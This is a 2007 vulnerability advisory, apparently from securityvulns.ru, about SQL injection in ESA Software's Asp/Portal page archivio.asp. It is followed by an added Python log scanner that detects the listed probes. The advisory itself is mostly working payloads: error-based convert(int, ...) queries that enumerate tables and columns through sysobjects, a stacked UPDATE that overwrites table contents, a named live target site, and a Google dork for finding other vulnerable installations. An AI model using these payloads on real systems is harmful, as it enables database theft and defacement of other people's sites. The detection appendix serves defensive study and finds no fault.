Computer Security
[EN] securityvulns.ru

From:okan alp <codexploder_(at)_hotmail.com>
Date:18.11.2007
Subject:ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection

ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection

Credit : CodeXpLoder'tq

Mail   : codexploder[at]hotmail[dot]com

Site   : codexploder.biyosecurity.net,biyofrm.com

Source : http://www.esasoftware.com

£££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££

Thnx   : Liz0ziM,eno7,sao,Crackers_child,erne,The_bekir,Di_lejyoner,3APA3A

Zeberus,Hacker_Onur,DesquneR,rapstarmurat,Uyussman

and

BiyoSecurity all members

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1-)  example.com/[path]/archivio.asp?ID=(sql method)

1-)  example.com/www/archivio.asp?ID=(sql method)

£££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££

2-) example.com/[path]/archivio.asp?ID=(sql method)

2-) example.com/www/archivio.asp?ID=(sql method)

2-) example.com/www/archivio.asp?ID=1'

2-) example.com/www/archivio.asp?ID=1 having 1=1

2-) example.com/www/archivio.asp?ID=1,2,3,4,5

2-) example.com/www/archivio.asp?ID=1,2,3,4,5+update+tbl+set+column='your text or meta code';--

2-) example.com/events/archivio.asp?ID=1 group by tbl.column having 1=1

#for db : convert(int, db_name(1))

     : convert(int, db_name(2))

#for other tbl    : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))

#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))


#tbl    : sezioni
#column : sezione

##########################################################

demo site: http://www.mondoesa-milano.com/www/archivio.asp?ID=5

google search code :  inurl:"www/archivio.asp"

demo site table list : http://codexploder.biyosecurity.net/alltabllo.JPG
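
Added example, not part of the original advisory: a log check for the probe shapes listed above against archivio.asp, built on the rule that a legitimate ID value is a plain integer. The log layout, the sample lines and the label names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Probe shapes listed in the advisory; the label names are chosen for this example.
INDICATORS = {
    "quote": re.compile(r"'"),
    "having": re.compile(r"\bhaving\b", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "convert_int": re.compile(r"\bconvert\s*\(\s*int\b", re.I),
    "system_table": re.compile(r"\bsys(?:objects|columns)\b", re.I),
    "stacked_update": re.compile(r"\bupdate\b.+\bset\b", re.I),
}

# Constructed sample lines in a simplified W3C-style layout (not real traffic).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2007-11-18 10:00:01 192.0.2.10 GET /www/archivio.asp ID=5 200",
    "2007-11-18 10:00:05 192.0.2.77 GET /www/archivio.asp ID=1' 500",
    "2007-11-18 10:00:09 192.0.2.77 GET /www/archivio.asp ID=1+having+1=1 500",
    "2007-11-18 10:00:12 192.0.2.77 GET /www/archivio.asp ID=1,2,3,4,5 500",
    "2007-11-18 10:00:15 192.0.2.10 GET /www/default.asp ID=1' 200",
]

def classify_id(value):
    """Return [] for a plain integer ID, else the matching labels (or ['non_integer'])."""
    if re.fullmatch(r"[0-9]{1,9}", value):
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
    return hits or ["non_integer"]

def scan(lines):
    """Return (client_ip, labels) for archivio.asp requests whose ID is not an integer."""
    findings = []
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) != 7:
            continue  # skip directives and lines that do not fit the assumed layout
        _date, _time, ip, _method, stem, query, _status = parts
        if not stem.lower().endswith("/archivio.asp"):
            continue
        # parse_qs decodes '+' and %XX, so encoded probes are matched in clear text
        params = parse_qs(query, keep_blank_values=True)
        for key, values in params.items():
            if key.lower() == "id":
                findings += [(ip, classify_id(v)) for v in values if classify_id(v)]
    return findings

if __name__ == "__main__":
    for ip, labels in scan(SAMPLE_LOG):
        print(ip, ",".join(labels))
```

The same integer-only rule, enforced in the page before the value reaches the query (or a typed bound parameter), is what removes the injection; the log check only shows who probed it.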
